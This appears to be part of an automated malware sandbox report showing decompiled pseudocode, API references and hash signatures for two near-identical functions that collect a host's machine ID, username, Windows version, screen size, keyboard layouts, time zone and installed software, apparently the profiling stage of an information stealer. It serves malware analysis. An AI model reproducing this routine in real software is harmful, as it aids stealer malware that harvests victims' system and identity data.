                                                                                                                                                                                              0x00417424
                                                                                                                                                                                              0x00417429
                                                                                                                                                                                              0x0041742c
                                                                                                                                                                                              0x00417438
                                                                                                                                                                                              0x0041743d
                                                                                                                                                                                              0x0041743f
                                                                                                                                                                                              0x00417447
                                                                                                                                                                                              0x0041744c
                                                                                                                                                                                              0x0041744f
                                                                                                                                                                                              0x0041745b
                                                                                                                                                                                              0x00417460
                                                                                                                                                                                              0x00417462
                                                                                                                                                                                              0x0041746a
                                                                                                                                                                                              0x0041746f
                                                                                                                                                                                              0x00417472
                                                                                                                                                                                              0x0041747e
                                                                                                                                                                                              0x00417483
                                                                                                                                                                                              0x00417488
                                                                                                                                                                                              0x0041748d
                                                                                                                                                                                              0x00417490
                                                                                                                                                                                              0x0041749c
                                                                                                                                                                                              0x004174a3
                                                                                                                                                                                              0x004174a8
                                                                                                                                                                                              0x004174ad
                                                                                                                                                                                              0x004174b2
                                                                                                                                                                                              0x004174b5
                                                                                                                                                                                              0x004174ba
                                                                                                                                                                                              0x004174c6
                                                                                                                                                                                              0x004174cd
                                                                                                                                                                                              0x004174d2
                                                                                                                                                                                              0x004174d4
                                                                                                                                                                                              0x004174e5
                                                                                                                                                                                              0x004174ec
                                                                                                                                                                                              0x004174f4
                                                                                                                                                                                              0x004174fe
                                                                                                                                                                                              0x00417505
                                                                                                                                                                                              0x00417508
                                                                                                                                                                                              0x0041750b
                                                                                                                                                                                              0x00417518
                                                                                                                                                                                              0x00417525
                                                                                                                                                                                              0x0041752d
                                                                                                                                                                                              0x0041753a
                                                                                                                                                                                              0x00417542
                                                                                                                                                                                              0x0041754f
                                                                                                                                                                                              0x0041755c
                                                                                                                                                                                              0x00417569
                                                                                                                                                                                              0x0041757b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                              • API String ID: 75899496-943277980
                                                                                                                                                                                              • Opcode ID: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                              • Instruction ID: faa4580c3751e67dc94fa71ed2fe839e62200f283c7ef28ebc39c5cb7ba49714
                                                                                                                                                                                              • Opcode Fuzzy Hash: 4be26f394024ad5c91b88013eb9f7e22f1757fe5255d0d7559962d2f1b93f894
                                                                                                                                                                                              • Instruction Fuzzy Hash: 94814F70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A568B19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 0041727C, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 211sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 43%
                                                                                                                                                                                              			E0041727C(signed int __eax, void* __ebx, intOrPtr* __edx, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t59;
				intOrPtr* _t141;
				void* _t142;
				intOrPtr _t172;
				void* _t180;
				intOrPtr _t183;
				intOrPtr _t184;

				_t181 = __esi;
				asm("das");
				 *__eax =  *__eax + __eax;
				 *__edx =  *__edx + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax + __eax;
				 *__eax =  *__eax & __eax;
				 *__eax =  *__eax + __eax;
				_t59 = __eax +  *__eax;
				 *_t59 =  *_t59 + _t59;
				 *_t59 =  *_t59 + _t59;
				_t183 = _t184;
				_t142 = 0xc;
				do {
					_push(0);
					_push(0);
					_t142 = _t142 - 1;
					_t189 = _t142;
				} while (_t142 != 0);
				_t141 = _t59;
				_push(_t183);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t184;
				_push("MachineID :   ");
				E00406C4C( &_v8, _t141, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t141, _t180, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t189);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t141);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v40);
				E004037DC( &_v68, "Screen: ",  *_t141);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t141,  &_v72, __esi, _t189);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t141,  &_v76, _t181, _t189);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t141, _v60);
				_push( *_t141);
				_push("Layouts: ");
				E00416FB8( &_v80, _t141, _t180, _t181);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("LocalTime: ");
				E00417198( &_v84, _t141, _t181);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t141);
				_push("Zone: ");
				E00417098( &_v88, _t141, _t180, _t181, _t189);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t141);
				E00416748( &_v92, _t141, _t180, _t181);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t141);
				E00416B94( &_v96, _t141, _t180, _t181, _t189);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t141);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t141, _t180, _t181);
				E00403798(_t141, _v100);
				_t172 = 0x4175a8;
				 *[fs:eax] = _t172;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}


































                                                                                                                                                                                              0x0041727c
                                                                                                                                                                                              0x0041727c
                                                                                                                                                                                              0x0041727d
                                                                                                                                                                                              0x0041727f
                                                                                                                                                                                              0x00417281
                                                                                                                                                                                              0x00417283
                                                                                                                                                                                              0x00417284
                                                                                                                                                                                              0x00417286
                                                                                                                                                                                              0x00417288
                                                                                                                                                                                              0x0041728a
                                                                                                                                                                                              0x0041728e
                                                                                                                                                                                              0x00417291
                                                                                                                                                                                              0x00417293
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x0041729a
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x004172a0
                                                                                                                                                                                              0x004172a4
                                                                                                                                                                                              0x004172a5
                                                                                                                                                                                              0x004172aa
                                                                                                                                                                                              0x004172ad
                                                                                                                                                                                              0x004172b0
                                                                                                                                                                                              0x004172b8
                                                                                                                                                                                              0x004172bd
                                                                                                                                                                                              0x004172c0
                                                                                                                                                                                              0x004172cc
                                                                                                                                                                                              0x004172d1
                                                                                                                                                                                              0x004172d3
                                                                                                                                                                                              0x004172dd
                                                                                                                                                                                              0x004172e2
                                                                                                                                                                                              0x004172e5
                                                                                                                                                                                              0x004172f1
                                                                                                                                                                                              0x004172f6
                                                                                                                                                                                              0x004172f8
                                                                                                                                                                                              0x00417300
                                                                                                                                                                                              0x00417305
                                                                                                                                                                                              0x00417308
                                                                                                                                                                                              0x00417315
                                                                                                                                                                                              0x00417320
                                                                                                                                                                                              0x00417325
                                                                                                                                                                                              0x0041732b
                                                                                                                                                                                              0x00417330
                                                                                                                                                                                              0x00417333
                                                                                                                                                                                              0x0041733b
                                                                                                                                                                                              0x00417340
                                                                                                                                                                                              0x00417343
                                                                                                                                                                                              0x00417350
                                                                                                                                                                                              0x0041735a
                                                                                                                                                                                              0x00417369
                                                                                                                                                                                              0x00417374
                                                                                                                                                                                              0x00417379
                                                                                                                                                                                              0x0041737f
                                                                                                                                                                                              0x00417384
                                                                                                                                                                                              0x00417387
                                                                                                                                                                                              0x0041738f
                                                                                                                                                                                              0x00417394
                                                                                                                                                                                              0x00417397
                                                                                                                                                                                              0x0041739c
                                                                                                                                                                                              0x004173a9
                                                                                                                                                                                              0x004173b3
                                                                                                                                                                                              0x004173c2
                                                                                                                                                                                              0x004173cd
                                                                                                                                                                                              0x004173d2
                                                                                                                                                                                              0x004173df
                                                                                                                                                                                              0x004173e4
                                                                                                                                                                                              0x004173e7
                                                                                                                                                                                              0x004173f6
                                                                                                                                                                                              0x004173fb
                                                                                                                                                                                              0x004173fe
                                                                                                                                                                                              0x0041740b
                                                                                                                                                                                              0x00417415
                                                                                                                                                                                              0x0041741a
                                                                                                                                                                                              0x0041741c
                                                                                                                                                                                              0x00417424
                                                                                                                                                                                              0x00417429
                                                                                                                                                                                              0x0041742c
                                                                                                                                                                                              0x00417438
                                                                                                                                                                                              0x0041743d
                                                                                                                                                                                              0x0041743f
                                                                                                                                                                                              0x00417447
                                                                                                                                                                                              0x0041744c
                                                                                                                                                                                              0x0041744f
                                                                                                                                                                                              0x0041745b
                                                                                                                                                                                              0x00417460
                                                                                                                                                                                              0x00417462
                                                                                                                                                                                              0x0041746a
                                                                                                                                                                                              0x0041746f
                                                                                                                                                                                              0x00417472
                                                                                                                                                                                              0x0041747e
                                                                                                                                                                                              0x00417483
                                                                                                                                                                                              0x00417488
                                                                                                                                                                                              0x0041748d
                                                                                                                                                                                              0x00417490
                                                                                                                                                                                              0x0041749c
                                                                                                                                                                                              0x004174a3
                                                                                                                                                                                              0x004174a8
                                                                                                                                                                                              0x004174ad
                                                                                                                                                                                              0x004174b2
                                                                                                                                                                                              0x004174b5
                                                                                                                                                                                              0x004174ba
                                                                                                                                                                                              0x004174c6
                                                                                                                                                                                              0x004174cd
                                                                                                                                                                                              0x004174d2
                                                                                                                                                                                              0x004174d4
                                                                                                                                                                                              0x004174e5
                                                                                                                                                                                              0x004174ec
                                                                                                                                                                                              0x004174f4
                                                                                                                                                                                              0x004174fe
                                                                                                                                                                                              0x00417505
                                                                                                                                                                                              0x00417508
                                                                                                                                                                                              0x0041750b
                                                                                                                                                                                              0x00417518
                                                                                                                                                                                              0x00417525
                                                                                                                                                                                              0x0041752d
                                                                                                                                                                                              0x0041753a
                                                                                                                                                                                              0x00417542
                                                                                                                                                                                              0x0041754f
                                                                                                                                                                                              0x0041755c
                                                                                                                                                                                              0x00417569
                                                                                                                                                                                              0x0041757b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
                                                                                                                                                                                              • API String ID: 75899496-943277980
                                                                                                                                                                                              • Opcode ID: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                              • Instruction ID: 915cc31ebaf767ee9912e0c916b5d60c1651ad94c460c6a34579714c0f7d2b16
                                                                                                                                                                                              • Opcode Fuzzy Hash: c1c0bba0cf5750b68568b08facd4bf438261c5427543421f404452287209528a
                                                                                                                                                                                              • Instruction Fuzzy Hash: 9A814E70A44209AFCB01FFA1CC42BCDBF7AAF49309F60407BB104B65D6D67D9A468B19
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Function 00417290, Relevance: 26.5, APIs: 5, Strings: 10, Instructions: 201sleepCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              C-Code - Quality: 40%
                                                                                                                                                                                              			E00417290(intOrPtr* __eax, void* __ebx, void* __edx, void* __edi, void* __esi) {
				char _v8;
				char _v12;
				intOrPtr _v16;
				char _v20;
				intOrPtr _v24;
				char _v28;
				char _v32;
				char _v36;
				intOrPtr _v40;
				char _v44;
				char _v48;
				char _v52;
				char _v56;
				intOrPtr _v60;
				char _v64;
				char _v68;
				char _v72;
				char _v76;
				char _v80;
				char _v84;
				char _v88;
				char _v92;
				char _v96;
				char _v100;
				intOrPtr* _t140;
				void* _t141;
				intOrPtr _t171;
				intOrPtr _t182;
				intOrPtr _t183;

				_t180 = __esi;
				_t179 = __edi;
				_t182 = _t183;
				_t141 = 0xc;
				do {
					_push(0);
					_push(0);
					_t141 = _t141 - 1;
					_t184 = _t141;
				} while (_t141 != 0);
				_t140 = __eax;
				_push(_t182);
				_push(0x41757c);
				_push( *[fs:eax]);
				 *[fs:eax] = _t183;
				_push("MachineID :   ");
				E00406C4C( &_v8, __eax, __esi);
				_push(_v8);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("EXE_PATH  :   ");
				E00416F88(0,  &_v12);
				_push(_v12);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				_push("Windows    :   ");
				E00407A4C( &_v28, _t140, __edi, __esi);
				_push(_v28);
				_push(0x4175f4);
				E00403850();
				E00403D2C( &_v20, _v24);
				_push(_v20);
				E004066C0( &_v32, _t184);
				_push(_v32);
				_push(0x4175fc);
				E00406BB4( &_v36);
				_push(_v36);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v16);
				E004037DC( &_v48, "Computer(Username) :   ",  *_t140);
				E00403D2C( &_v44, _v48);
				_push(_v44);
				E00406610( &_v52);
				_push(_v52);
				_push(0x417630);
				E004065CC( &_v56);
				_push(_v56);
				_push(0x417638);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v40);
				E004037DC( &_v68, "Screen: ",  *_t140);
				E00403D2C( &_v64, _v68);
				_push(_v64);
				E00406FDC(GetSystemMetrics(0), _t140,  &_v72, _t180, _t184);
				_push(_v72);
				_push(0x417654);
				E00406FDC(GetSystemMetrics(1), _t140,  &_v76, _t180, _t184);
				_push(_v76);
				_push(0x417604);
				E00403E1C();
				E0040377C(_t140, _v60);
				_push( *_t140);
				_push("Layouts: ");
				E00416FB8( &_v80, _t140, __edi, _t180);
				_push(_v80);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("LocalTime: ");
				E00417198( &_v84, _t140, _t180);
				_push(_v84);
				_push(0x4175a8);
				E00403850();
				_push( *_t140);
				_push("Zone: ");
				E00417098( &_v88, _t140, _t179, _t180, _t184);
				_push(_v88);
				_push(0x4175cc);
				E00403850();
				_push( *_t140);
				E00416748( &_v92, _t140, _t179, _t180);
				_push(_v92);
				_push(0x4175cc);
				E00403850();
				Sleep(1);
				_push( *_t140);
				E00416B94( &_v96, _t140, _t179, _t180, _t184);
				_push(_v96);
				_push(0x4175a8);
				_push(0x4175a8);
				E00403850();
				Sleep(1);
				_push( *_t140);
				_push("[Soft]");
				E00403850();
				Sleep(1);
				E00415F30( &_v100, _t140, _t179, _t180);
				E00403798(_t140, _v100);
				_t171 = 0x4175a8;
				 *[fs:eax] = _t171;
				_push(E00417583);
				E00403508( &_v100, 6);
				E00403B98( &_v76, 2);
				E004034E4( &_v68);
				E00403B98( &_v64, 4);
				E004034E4( &_v48);
				E00403B98( &_v44, 4);
				E00403508( &_v28, 2);
				E00403B98( &_v20, 2);
				return E00403508( &_v12, 2);
			}
































                                                                                                                                                                                              0x00417290
                                                                                                                                                                                              0x00417290
                                                                                                                                                                                              0x00417291
                                                                                                                                                                                              0x00417293
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x00417298
                                                                                                                                                                                              0x0041729a
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x0041729c
                                                                                                                                                                                              0x004172a0
                                                                                                                                                                                              0x004172a4
                                                                                                                                                                                              0x004172a5
                                                                                                                                                                                              0x004172aa
                                                                                                                                                                                              0x004172ad
                                                                                                                                                                                              0x004172b0
                                                                                                                                                                                              0x004172b8
                                                                                                                                                                                              0x004172bd
                                                                                                                                                                                              0x004172c0
                                                                                                                                                                                              0x004172cc
                                                                                                                                                                                              0x004172d1
                                                                                                                                                                                              0x004172d3
                                                                                                                                                                                              0x004172dd
                                                                                                                                                                                              0x004172e2
                                                                                                                                                                                              0x004172e5
                                                                                                                                                                                              0x004172f1
                                                                                                                                                                                              0x004172f6
                                                                                                                                                                                              0x004172f8
                                                                                                                                                                                              0x00417300
                                                                                                                                                                                              0x00417305
                                                                                                                                                                                              0x00417308
                                                                                                                                                                                              0x00417315
                                                                                                                                                                                              0x00417320
                                                                                                                                                                                              0x00417325
                                                                                                                                                                                              0x0041732b
                                                                                                                                                                                              0x00417330
                                                                                                                                                                                              0x00417333
                                                                                                                                                                                              0x0041733b
                                                                                                                                                                                              0x00417340
                                                                                                                                                                                              0x00417343
                                                                                                                                                                                              0x00417350
                                                                                                                                                                                              0x0041735a
                                                                                                                                                                                              0x00417369
                                                                                                                                                                                              0x00417374
                                                                                                                                                                                              0x00417379
                                                                                                                                                                                              0x0041737f
                                                                                                                                                                                              0x00417384
                                                                                                                                                                                              0x00417387
                                                                                                                                                                                              0x0041738f
                                                                                                                                                                                              0x00417394
                                                                                                                                                                                              0x00417397
                                                                                                                                                                                              0x0041739c
                                                                                                                                                                                              0x004173a9
                                                                                                                                                                                              0x004173b3
                                                                                                                                                                                              0x004173c2
                                                                                                                                                                                              0x004173cd
                                                                                                                                                                                              0x004173d2
                                                                                                                                                                                              0x004173df
                                                                                                                                                                                              0x004173e4
                                                                                                                                                                                              0x004173e7
                                                                                                                                                                                              0x004173f6
                                                                                                                                                                                              0x004173fb
                                                                                                                                                                                              0x004173fe
                                                                                                                                                                                              0x0041740b
                                                                                                                                                                                              0x00417415
                                                                                                                                                                                              0x0041741a
                                                                                                                                                                                              0x0041741c
                                                                                                                                                                                              0x00417424
                                                                                                                                                                                              0x00417429
                                                                                                                                                                                              0x0041742c
                                                                                                                                                                                              0x00417438
                                                                                                                                                                                              0x0041743d
                                                                                                                                                                                              0x0041743f
                                                                                                                                                                                              0x00417447
                                                                                                                                                                                              0x0041744c
                                                                                                                                                                                              0x0041744f
                                                                                                                                                                                              0x0041745b
                                                                                                                                                                                              0x00417460
                                                                                                                                                                                              0x00417462
                                                                                                                                                                                              0x0041746a
                                                                                                                                                                                              0x0041746f
                                                                                                                                                                                              0x00417472
                                                                                                                                                                                              0x0041747e
                                                                                                                                                                                              0x00417483
                                                                                                                                                                                              0x00417488
                                                                                                                                                                                              0x0041748d
                                                                                                                                                                                              0x00417490
                                                                                                                                                                                              0x0041749c
                                                                                                                                                                                              0x004174a3
                                                                                                                                                                                              0x004174a8
                                                                                                                                                                                              0x004174ad
                                                                                                                                                                                              0x004174b2
                                                                                                                                                                                              0x004174b5
                                                                                                                                                                                              0x004174ba
                                                                                                                                                                                              0x004174c6
                                                                                                                                                                                              0x004174cd
                                                                                                                                                                                              0x004174d2
                                                                                                                                                                                              0x004174d4
                                                                                                                                                                                              0x004174e5
                                                                                                                                                                                              0x004174ec
                                                                                                                                                                                              0x004174f4
                                                                                                                                                                                              0x004174fe
                                                                                                                                                                                              0x00417505
                                                                                                                                                                                              0x00417508
                                                                                                                                                                                              0x0041750b
                                                                                                                                                                                              0x00417518
                                                                                                                                                                                              0x00417525
                                                                                                                                                                                              0x0041752d
                                                                                                                                                                                              0x0041753a
                                                                                                                                                                                              0x00417542
                                                                                                                                                                                              0x0041754f
                                                                                                                                                                                              0x0041755c
                                                                                                                                                                                              0x00417569
                                                                                                                                                                                              0x0041757b

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173D7
                                                                                                                                                                                              • GetSystemMetrics.USER32 ref: 004173EE
                                                                                                                                                                                                • Part of subcall function 00416748: GetSystemInfo.KERNEL32(0041A13A,00000000,004168D4,?,?,00000000,00000000,?,0041748D,?,,?,Zone: ,?,004175A8,?), ref: 0041676C
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ,?,004175A8,?,Layouts: ,?), ref: 004174A3
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,,?,?,), ref: 00416C04
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C0A
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2,?,00000001,), ref: 00416C32
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,kernel32.dll), ref: 00416C38
                                                                                                                                                                                                • Part of subcall function 00416B94: LoadLibraryA.KERNEL32(00000000,00000000,00000000,kernel32.dll,00000000,00000000,kernel32.dll,00000000,00000000,00416ECA,?,-00000001,0041B0FC,?,?,004174B2), ref: 00416C77
                                                                                                                                                                                                • Part of subcall function 00416B94: GetProcAddress.KERNEL32(00000000,00000000), ref: 00416C7D
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ,?,004175A8,?,LocalTime: ), ref: 004174CD
                                                                                                                                                                                              • Sleep.KERNEL32(00000001,004175A8,[Soft],?,00000001,004175A8,004175A8,?,?,00000001,,?,?,,?,Zone: ), ref: 004174EC
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000002,00000000,00000000,00020019,0041A69E,00000000,00416452,?,-00000001,0041B0FC,?,00000000,00000000,?,004174F9,00000001), ref: 00415F8D
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 00416115
                                                                                                                                                                                                • Part of subcall function 00415F30: RegOpenKeyExA.ADVAPI32(80000001,00000000,00000000,00020019,0041A69E,0041A69E,00000001,?,000003E9,),?,?,00000000,00416528,?,?), ref: 00416150
                                                                                                                                                                                                • Part of subcall function 00415F30: RegEnumKeyA.ADVAPI32(0041A69E,00000000,?,000003E9), ref: 004162D8
                                                                                                                                                                                                • Part of subcall function 00403B98: SysFreeString.OLEAUT32(?), ref: 00403BAB
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000006.00000002.272222286.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressLibraryLoadProcSleepSystem$EnumMetricsOpen$FreeInfoString
                                                                                                                                                                                              • String ID: $Computer(Username) : $EXE_PATH : $Layouts: $LocalTime: $MachineID : $Screen: $Windows : $Zone: $[Soft]
